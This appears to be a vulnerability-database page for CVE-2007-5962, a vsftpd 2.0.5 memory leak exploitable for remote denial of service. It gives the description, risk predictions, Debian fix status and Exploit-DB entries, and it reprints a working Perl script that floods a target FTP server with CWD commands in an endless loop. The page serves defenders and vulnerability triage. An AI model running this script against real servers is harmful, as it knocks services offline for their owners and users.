VIR Vulnerability Intelligence Relay

CVE-2007-5962

unknown
Published — · Modified —
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
1.0

Description

Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath appliances, allows remote attackers to cause a denial of service (memory consumption) via a large number of CWD commands, as demonstrated by an attack on a daemon with the deny_file configuration option.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-31818 dos windows verified
Martin Nagy · 2008-05-21

vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)

Source code queued for fetch — refresh in a moment.
EDB-31819 dos windows verified
Praveen Darshanam · 2008-05-21

vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)

Source code queued for fetch — refresh in a moment.
EDB-5814 dos linux verified perl · 1 KB
Praveen Darshanam · 2008-06-14

vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption

perl exploit Source: Exploit-DB 
#!/usr/bin/perl -w


#######################################################################################
#		vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
#		Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
#
#		Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
#		option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
#
#		I tried to modify local exploit found at securityfocus such that we can remotely exloit
#
# 		Author shall not bear any responsibility
#		Author:	Praveen Darshanam
#		Email:	praveen[underscore]recker[at]sify.com
#		Date:	07th June, 2008
#
#
########################################################################################


use Net::FTP;
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";

while(1)
{
#this loop runs infinitely

$ftp -> cwd();
}

$ftp->quit;

# milw0rm.com [2008-06-14]

OS impact
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 0
sid Fixed 0
forky Fixed 0
bullseye Fixed 0
bookworm Fixed 0

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.